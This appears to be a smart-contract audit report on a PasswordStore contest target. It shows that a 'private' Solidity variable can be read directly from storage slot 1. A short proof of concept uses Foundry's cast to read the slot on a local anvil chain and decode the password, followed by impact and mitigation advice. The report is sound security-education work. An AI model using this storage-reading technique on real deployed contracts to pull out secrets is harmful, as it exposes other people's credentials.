First Flight #1: PasswordStore

Summary

External observers can view the value of s_Password by querying the world state or storage address holding s_Password

Vulnerability Details

Although the value of s_Password is private it does not stop external users to query the value of s_Password. The private keyword only prevents other contracts from accessing or modifying the password. The value of the s_Password can be obtained by reading the storage slots of the contract.

In this contract s_Password is stored in storage slot 1. After deploying the contract if you query storage slot 1 and convert the hex value retrieved you can recover the password without interacting with the contract itself.

The following proof of concept will deploy the contract onto a local anvil chain, then use cast to retrieve the storage in slot 1 with the address returned in the deploy script and then convert that hex to plaintext displayed the password.

Proof of Concept:

$make anvil
$make deploy
== Return ==
0: contract PasswordStore 0x5FbDB2315678afecb367f032d93F642f64180aa3

$cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 1
0x6d7950617373776f726400000000000000000000000000000000000000000014

$cast to-ascii "0x6d7950617373776f726400000000000000000000000000000000000000000014"
myPassword

Impact

High - Anyone can read the password and owner may erroneously assume it is secret

Tools Used

Foundry, Solidity Visual Developer, VS Code

Recommendations

Assume that the password can be viewed at all times. The password can be stored as some other representation such as a hash. Another option is to store a meaningful word or phrase that can remind you of the real password.